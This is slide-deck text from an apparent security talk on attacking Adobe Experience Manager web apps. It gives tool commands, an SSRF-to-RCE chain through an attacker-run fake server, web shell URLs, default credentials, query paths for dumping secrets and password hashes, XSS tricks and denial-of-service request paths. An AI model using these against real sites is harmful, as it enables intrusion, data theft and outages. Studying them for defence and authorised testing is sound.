  • 26. AEM RCE bundle, build yourself mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.adobe.granite.archetypes -DarchetypeArtifactId=aem-project-archetype -DarchetypeVersion=11 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.day.jcr.vault -DarchetypeArtifactId=multimodule-content-package-archetype -DarchetypeVersion=1.0.2 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ For AEM 6.0 or newer For AEM 5.6 26/124
  • 28. AEM hacker toolset • Toolset – https://github.com/0ang3el/aem-hacker.git • Includes scripts • aem_hacker.py • aem_discoverer.py • aem_enum.py • aem_ssrf2rce.py, aem_server.py, response.bin • aem-rce-sling-script.sh 28/124
  • 29. aem_hacker.py • Main tool – scans AEM webapp for misconfigurations and vulnerabilities • Tries to bypass AEM dispatcher • You need to run it from VPS to detect SSRFs! • You need to do extra manual work to detect if findings are exploitable 29/124
  • 30. aem_hacker.py python3 aem_hacker.py -h usage: aem_hacker.py [-h] [-u URL] [--proxy PROXY] [--debug] [--host HOST] [--port PORT] [--workers WORKERS] AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit -u URL, --url URL url to scan --proxy PROXY http and https proxy --debug debug output --host HOST hostname or IP to use for back connections during SSRF detection --port PORT opens port for SSRF detection --workers WORKERS number of parallel workers 30/124
  • 31. aem_hacker.py python3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip • Common usage 31/124
  • 32. aem_hacker.py – checks 1/3 • Exposed DefaultGetServlet • Exposed QueryBulderJsonServlet and QueryBuilderFeedServlet • Exposed GQLServlet • Exposed POSTServlet • Exposed LoginStatusServlet • Users with default password • Exposed Felix Console • Enabled WCMDebugFilter 32/124
  • 33. aem_hacker.py – checks 2/3 • Exposed WCMSuggestionsServlet • Exposed AuditlogServlet • Exposed CRXDE logs • Exposed CRXDE and CRX • SSRF SalesforceSecretServlet • SSRF ReportingServicesServlet • SSRF SitecatalystServlet • SSRF AutoprovisioningServlet 33/124
  • 34. aem_hacker.py – checks 3/3 • SSRF OpensocialProxy • SWF XSSes • Deser ExternalJobServlet • Exposed Webdav • Exposed Groovy Console • Exposed ACS AEM Tools 34/124
  • 35. aem_discoverer.py • Allows to scan urls and find AEM webapps among them • Tries to bypass AEM dispatcher • Common usage python3 aem_discoverer.py --file urls.txt --workers 150 35/124
  • 36. aem_discoverer.py python3 aem_discoverer.py -h usage: aem_discoverer.py [-h] [--file FILE] [--proxy PROXY] [--debug] [--workers WORKERS] AEM discoverer by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --file FILE file with urls --proxy PROXY http and https proxy --debug debug output --workers WORKERS number of parallel workers 36/124
  • 37. aem_enum.py • Automate usernames and secrets grabbing • Traverses JCR using DefaultGetServlet of AEM 37/124
  • 38. aem_enum.py python3 aem_enum.py -h usage: aem_enum.py [-h] [--url URL] [--base BASE] [--grabdepth GRABDEPTH] [--maxdepth MAXDEPTH] [--workers WORKERS] [--out OUT] [--proxy PROXY] [--debug] AEM exploration tool by @0ang3el (grabs users and secrets), see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --url URL AEM webapp URL, required parameter --base BASE set base node (/etc or /apps or /home or /var), if not set, base node is selected automatically --grabdepth GRABDEPTH JCR subtree depth on each iteration, 2 should be a safe value for all nodes --maxdepth MAXDEPTH maximum depth for JCR search, increase it to find more --workers WORKERS number of parallel workers --out OUT CSV file with results, delimiter symbol is | --proxy PROXY http and https proxy --debug debug output 38/124
  • 39. aem_enum.py • Common usage • Change start node python3 aem_enum.py --url https://aem.webapp python3 aem_enum.py --url https://aem.webapp --base /etc 39/124
  • 40. aem_ssrf2rce.py & aem_server.py • aem_ssrf2rce.py & aem_server.py + response.bin • Helps to exploit SSRF in SitecatalystServlet or AutoprovisioningServlet as RCE • It should work on AEM before AEM-6.2-SP1-CFP7 running on Jetty • Exploits reverse replication to get RCE after joining topology using SSRF 40/124
  • 41. aem_ssrf2rce.py python3 aem_ssrf2rce.py -h usage: aem_ssrf2rce.py [-h] [--url URL] [--fakeaem FAKEAEM] [--proxy PROXY] optional arguments: -h, --help show this help message and exit --url URL URL for SitecatalystServlet or AutoprovisioningServlet, including path, without query part --fakeaem FAKEAEM hostname/ip of fake AEM server --proxy PROXY http and https proxy 41/124
  • 42. aem_ssrf2rce.py & aem_server.py • Place aem_server.py and response.bin on your VPS • Run aem_server.py script python3 aem_server.py starting fake AEM server... running server... 42/124
  • 43. aem_ssrf2rce.py & aem_server.py • Run aem_ssrf2rce.py script python3 aem_ssrf2rce.py --url https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip 43/124
  • 44. aem_ssrf2rce.py & aem_server.py • If RCE is possible, you should see incoming connection to your fake AEM server • Shell is accessible from https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls 44/124
  • 45. aem-rce-sling-script.sh • Allows to get RCE when Felix Console is not available, but you have permissions to create new nodes under /apps JCR node • Usage • Shell is available at https://aem.webapp/rcenode.html?cmd=ls ./aem-rce-sling-script.sh https://aem.webapp username password 45/124
  • 47. Insecurity of bundles and packages
  • 48. RCE via exposed Groovy console https://github.com/OlsonDigital/aem-groovy-console 48/124
  • 49. RCE via exposed Groovy console • Exposes servlet at without authentication 49/124
  • 50. RCE via exposed Groovy console 50/124
  • 51. RCE via ACS AEM Tools • https://adobe-consulting-services.github.io/acs-aem-tools/ 51/124
  • 52. RCE via ACS AEM Tools • Exposes Fiddle with ability to execute JSP scripts at • • May or may not require authentication 52/124
  • 53. RCE via ACS AEM Tools 53/124
  • 55. What can you do w/ valid creds? • RCE • Deface site – create/modify/delete content • Persistent XSS 55/124
  • 56. How to get valid creds? • Default credentials • admin:admin • author:author • Bruteforce creds • properties , , , etc. contain usernames • automates usernames grabbing • AEM supports basic authorization 56/124
  • 57. RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps WebDAV 57/124
  • 58. RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload AEM RCE OSGI bundle WebDAVhttps://github.com/0ang3el/aem-rce-bundle.git 58/124
  • 59. RCE via uploading OSGI bundle 59/124
  • 60. RCE via uploading OSGI bundle 60/124
  • 61. RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html aem-rce-sling-script.sh 61/124
  • 62. RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV cadaver https://aem.webapp/crx/repository/crx.default https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html 62/124
  • 63. Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite 63/124
  • 64. Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite https://sling.apache.org/documentation/bundles/manipulating-content-the-slingpostservlet-servlets-post.html 64/124
  • 65. Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite cadaver https://aem.webapp/crx/repository/crx.default 65/124
  • 66. Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Litehttps://aem.webapp/crx/de/index.jsp 66/124
  • 67. Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder 67/124
  • 68. Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html#hasPermission 68/124
  • 69. Anonymous user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite /content/usergenerated /content/usergenerated/etc/commerce/smartlists hasPermission predicate of Querybuilder Anonymous usually has jcr:write permission for node Anonymous usually has jcr:addChildNode permission for node 69/124
  • 70. Tricks to get persistent XSS • SVG in property value • create property with SVG content • add /a.svg to the URL • HTML in property value • create property with HTML content and name aaa.html • jcr:data and jcr:mimeType (upload file) • Other 70/124
  • 71. Anonymous user & SVG 71/124
  • 72. Anonymous user & SVG 72/124
  • 73. Anonymous user & SVG 73/124
  • 74. Anonymous user & HTML prop 74/124
  • 75. Anonymous user & HTML prop 75/124
  • 76. Anonymous user & upload file 76/124
  • 77. Anonymous user & upload file 77/124
  • 79. Extracting secrets from JCR • Everything is stored in JCR repository as node properties including: • Secrets (passwords, encryption keys, tokens) • Configuration • PII • Usernames 79/124
  • 80. Why is it possible? • ACL is misconfigured for a JCR node, storing secrets • Admins rely on AEM dispatcher protection 80/124
  • 81. What to use • DefaultGetServlet • QueryBuilderJsonServlet • QueryBuilderFeedServlet • GQLSearchServlet • Other 81/124
  • 82. DefaultGetServlet • Allows to get JCR node with its props • Selectors • tidy • infinity • numeric value: -1, 0, 1 … 99999 • Formats • json • xml • res 82/124
  • 83. DefaultGetServlet https://aem.site/.tidy.3.json jcr:root selector tidy selector depth output format Get JCR nodes with props starting from jcr:root with depth 3 and return formatted JSON 83/124
  • 84. DefaultGetServlet - How to grab • Get node names, start from • /.1.json • /.ext.json • /.childrenlist.json • Or guess node names: • Common names - /content, /home, /var, /etc • Dump props for each child node of • /etc.json or /etc.5.json or /etc.-1.json 84/124
  • 85. DefaultGetServlet – What to grab • Interesting nodes • /etc – may contain secrets (passwords, enc. keys, …) • /apps/system/config or /apps/<smth>/config (passwords, …) • /var – may contain private information (PII) • /home – password hashes, PII • Interesting props – contain AEM users names • jcr:createdBy • jcr:lastModifiedBy • cq:LastModifiedBy 85/124
  • 86. DefaultGetServlet – In the wild /apps/<redacted>/config.author.tidy.1..json/a.ico 86/124
  • 87. DefaultGetServlet – In the wild /etc/ocs/libs/puppet/bootstrap/etc/ssl/private/ocs-x509-client-key.pem/jcr:content/jcr:data.tidy.-1…json/b.gif 87/124
  • 88. QueryBuilder servlets • We can search JCR using different predicates • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder- predicate-reference.html • QueryBuilderJsonServlet allows to get Nodes and their Props • /bin/querybuilder.json • QueryBuilderFeedServlet allows to get Nodes (no Props) • /bin/querybuilder.feed.servlet • we can use blind binary search for Props 88/124
  • 89. Examples of useful searches • type=nt:file&nodename=*.zip • path=/home&p.hits=full&p.limit=-1 • hasPermission=jcr:write&path=/content • hasPermission=jcr:addChildNodes&path=/content • hasPermission=jcr:modifyProperties&path=/content • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation=unequals&property.value=admin&type=n t%3abase&p.limit=1000 • path=/etc&path.flat=true&p.nodedepth=0 • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1 89/124
  • 90. QueryBuilder – In the wild type=nt:file&nodename=*.zip 90/124
  • 91. QueryBuilder – In the wild path=/home&p.hits=full&p.limit=-1 91/124
  • 92. QueryBuilder – In the wild path=/apps/system/config 92/124
  • 93. QueryBuilder – In the wild hasPermission=jcr:write&path=/content 93/124
  • 95. Opensocial (Shindig) proxy • SSRF via Opensocial (Shindig) proxy • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 95/124
  • 97. ReportingServicesProxyServlet • SSRF via ReportingServicesProxyServlet (CVE-2018-12809) • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 97/124
  • 100. SalesforceSecretServlet 100/124 • SSRF via SalesforceSecretServlet (CVE-2018-5006) • • Allows to send POST request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from some internal network services • POST ≡ GET • Reflected XSS
  • 103. SiteCatalystServlet • SSRF via SiteCatalystServlet • • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 103/124
  • 105. AutoProvisioningServlet • SSRF via AutoProvisioningServlet • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 105/124
  • 107. SSRF >>> RCE • It’s possible to escalate SSRFs in SiteCatalystServlet and AutoProvisioningServlet to RCE on Publish server • Requirements • AEM 6.2 before AEM-6.2-SP1-CFP7 fix pack • Jetty appserver (default installation) 107/124
  • 110. ExternalJobPostServlet • Old bug, affects AEM 5.5 – 6.1 • http://aempodcast.com/2016/podcast/aem-podcast-java-deserialization-bug/ • • Parameter accepts Java serialized stream and passes to 110/124
  • 113. XXE via WebDAV • Old bug, CVE-2015-1833 • It’s possible to read local files with PROPFIND/PROPPATCH • https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about-webdav 113/124
  • 114. Check WebDAV support • Send request • header in response contain webdav-related methods • Navigate to • 401 HTTP and WWW-Authenticate: Basic realm="Adobe CRX WebDAV" 114/124
  • 116. Vectors • SWF XSSes (kudos to @fransrosen) • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response • SuggestionHandlerServlet (reflect parameter) 116/124
  • 121. DoS is easy • /.ext.infinity.json • /.ext.infinity.json?tidy=true • /bin/querybuilder.json?type=nt:base&p.limit=-1 • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix= • /content.assetsearch.json?query=*&start=0&limit=10&random=123 • /..assetsearch.json?query=*&start=0&limit=10&random=123 • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111 121/124
  • 123. Conclusion • AEM target is a goldmine for a bug hunter • I hope my work will help to approach AEM targets 123/124